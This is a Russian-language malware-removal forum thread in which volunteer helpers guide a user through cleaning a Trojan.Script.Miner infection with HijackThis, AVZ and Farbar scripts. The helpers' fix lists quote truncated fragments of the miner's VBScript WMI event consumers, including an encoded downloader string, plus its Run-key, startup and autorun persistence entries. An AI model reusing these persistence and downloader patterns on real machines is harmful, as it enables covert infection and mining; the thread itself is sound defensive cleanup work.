Антивирус детектит вирусы без остановки [Trojan.Script.Miner.a]

[narra]

Всем доброго времени суток! Повтыкал старые флешки и жесткие диски, теперь аваст постоянно спамит "угроза обезврежена", закрываешь одно, вылетает другое уведомление. Подозреваю, что что-то подцепил. Логи прикрепляю. Заранее спасибо за помощь.

Hi2PV7L - Imgur.jpg

[Info_bot]

Уважаемый(ая) narra, спасибо за обращение на наш форум!

Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

[Vvvyg]

Логи неполные.

Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:

Код:

O23 - Service S2: MicrosoftPassportContainer - (MsRkNrL) - C:\Windows\system32\wscript.exe //B "C:\autoexec.vbs"
O25 - WMI Event: rknrl_consumer - rknrl_filter - On Error Resume Next:Dim Fso,shellobj,objFile,Wmi,regPath,startPath:Set shellobj = CreateObject("WScript.Shell"):Set FSO = CreateObject("Scripting.Filesystemobject"):Set Wmi=getobject("winmgmts:\\.\root\cimv2"):set Wpro=Wmi.execquery("select * from win32_process where name='wscript.exe'"):regPath = (139729 bytes)
O25 - WMI Event: rknrlmon_consumer - rknrl_filter - On Error Resume Next:Dim wShell,Fso,mHttp,Wmi:Set wShell = CreateObject("WScript.shell"):host="":morder=aB("oD8txT9EYX5SzDWEzD5MWT9IzDChonmhWDR6mgF1mHZGWHySzgZdNHZGxXy4RX0GaT9fBciOoDCOWnehkgVtoH1fzDmOzTuAzZ=="):Set Fso = CreateObject("scripting.filesystemobject"):Set mHttp = CreateObject("msxml2.xml(6941 bytes)

Удалите программу Web Companion.

Отключите временно все экраны Avast и переделайте логи.

[narra]

Во время фикса (вроде 023) выдало ошибку:
The service MsRkNrL is system-critical! It can't be deleted.


Web Companion в программах и компонентах отсутствует.
В меню пуск нашел Web Companion, указанный в свойствах путь C:\Program Files (x86)\Lavasoft не существует, поэтому просто удаляю вот эту папку на скриншоте
dzxD6A1 (1).png

Новые логи прикрепляю. Только я собирал их при выключенном интернете, т.к. очень страшно выключать аваст при активном интернет соединении.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:

Код:

O15 - Trusted Zone: http://webcompanion.com
O25 - WMI Event: rknrl_consumer - rknrl_filter - On Error Resume Next:Dim Fso,shellobj,objFile,Wmi,regPath,startPath:Set shellobj = CreateObject("WScript.Shell"):Set FSO = CreateObject("Scripting.Filesystemobject"):Set Wmi=getobject("winmgmts:\\.\root\cimv2"):set Wpro=Wmi.execquery("select * from win32_process where name='wscript.exe'"):regPath = (139729 bytes)
O25 - WMI Event: rknrlmon_consumer - rknrl_filter - On Error Resume Next:Dim wShell,Fso,mHttp,Wmi:Set wShell = CreateObject("WScript.shell"):host="":morder=aB("oD8txT9EYX5SzDWEzD5MWT9IzDChonmhWDR6mgF1mHZGWHySzgZdNHZGxXy4RX0GaT9fBciOoDCOWnehkgVtoH1fzDmOzTuAzZ=="):Set Fso = CreateObject("scripting.filesystemobject"):Set mHttp = CreateObject("msxml2.xml(6941 bytes)

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:

Код:

begin
 QuarantineFile('C:\Users\5795~1\AppData\Local\Temp\rknrl.vbs', '');
 QuarantineFile('C:\Users\Аноним\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs', '');
 DeleteFile('C:\Program Files (x86)\Lavasoft\Web', '32');
 DeleteFile('C:\Users\5795~1\AppData\Local\Temp\rknrl.vbs', '64');
 DeleteFile('C:\Users\Аноним\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs', '64');
 DeleteFile('Companion\Application\WebCompanion.exe', '32');
 DeleteService('MsRkNrL');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Web Companion', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Web Companion', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'winstart', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
 ExecuteWizard('TSW', 2, 2, true);
RebootWindows(false);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[narra]

HijackThis в этот раз отработал без ошибок.

AVZ выдавал ошибку вроде по поводу создания архива, после выключения экранов и интернета, скрипт выполнился успешно. Архив с карантином залил через кнопку сверху.

FRST при включенном авасте завис, при выключенном отработал и создал 2 файла, их прикрепляю.

Уведомления аваста все еще выскакивают.

[thyrex]

1. Выделите следующий код:

Код:

Start::
CreateRestorePoint:
HKLM\...\Run: [winstart] => wscript.exe //B "C:\Users\5795~1\AppData\Local\Temp\rknrl.vbs" <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-369596930-2712290499-2790879322-1000\...\MountPoints2: H - H:\AutoRun.exe
HKU\S-1-5-21-369596930-2712290499-2790879322-1000\...\MountPoints2: {0dc6069c-fe20-11e9-8baa-4487fcc0846b} - H:\Autorun.exe
HKU\S-1-5-21-369596930-2712290499-2790879322-1000\...\MountPoints2: {9aabd29d-eb7a-11e9-a4bb-4487fcc0846b} - M:\AutoRun.exe
HKU\S-1-5-21-369596930-2712290499-2790879322-1000\...\MountPoints2: {9aabd2a6-eb7a-11e9-a4bb-4487fcc0846b} - H:\AutoRun.exe
Startup: C:\Users\Аноним\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs [2021-01-09] () [File not signed]
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
2021-01-09 00:04 - 2021-01-09 00:51 - 000000218 ___SH C:\autoexec.vbs
2021-01-04 23:50 - 2021-01-05 17:12 - 000000712 _____ C:\Windows\system32\win.vbs
2021-01-04 01:08 - 2021-01-05 17:12 - 000000218 _____ C:\Windows\system32\rknrl.vbs
2021-01-03 22:10 - 2021-01-09 00:51 - 000150896 ___SH C:\DM6331.TMP
2021-01-03 22:10 - 2021-01-05 17:12 - 000121038 _____ C:\Windows\system32\DM6331.TMP
File: C:\Users\Аноним\automatic.bat
File: C:\Users\Аноним\automatic.js
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrl_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\"::
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"rknrlmon_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"rknrl_filter\"::
WMI:subscription\__TimerInstruction->rknrl_itimer::
WMI:subscription\__IntervalTimerInstruction->rknrl_itimer::
WMI:subscription\__EventFilter->rknrl_filter::[Query => select * from __timerevent where timerid="rknrl_itimer"]
WMI:subscription\ActiveScriptEventConsumer->rknrlmon_consumer::[ScriptText => On Error Resume Next:Dim wShell,Fso,mHttp,Wmi:Set wShell = CreateObject("WScript.shell"):host="":morder=aB("oD8txT9EYX5SzDWEzD5MWT9IzDChonmhWDR6mgF1mHZGWHySzgZdNHZGxXy4RX0GaT9fBciOoDCOWnehkgVtoH1fzDmOzTuAzZ=="):Set Fso = CreateObject("scripting.filesystemobject"):Set mHttp = CreateObject("msxml2.xml (the data entry has 6641 more characters).]
WMI:subscription\ActiveScriptEventConsumer->rknrl_consumer::[ScriptText => On Error Resume Next:Dim Fso,shellobj,objFile,Wmi,regPath,startPath:Set shellobj = CreateObject("WScript.Shell"):Set FSO = CreateObject("Scripting.Filesystemobject"):Set Wmi=getobject("winmgmts:\\.\root\cimv2"):set Wpro=Wmi.execquery("select * from win32_process where name='wscript.exe'"):regPath =  (the data entry has 154358 more characters).]
AlternateDataStreams: C:\ProgramData\TEMP:10D14739 [238]
AlternateDataStreams: C:\ProgramData\TEMP:FB6A21E3 [126]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:10D14739 [238]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:FB6A21E3 [126]
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

[narra]

Правильно я понимаю, надо было просто скопировать в буфер обмена и никуда не вставлять, да?
Сделал все так, только забыл выключить экраны аваста, но он вроде ни на что не триггерился.

- - - - -Добавлено - - - - -

fixlog прикрепляю

- - - - -Добавлено - - - - -

automatic.js и automatic.bat это мои файлы, в них вредоносного кода нет

[thyrex]

Что сейчас с проблемой?

[CyberHelper]

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:

• =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
• =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 2
• =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
  =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
  
  1. c:\users\5795~1\appdata\local\temp\rknrl.vbs - Trojan.Scr=
     ipt.Miner.a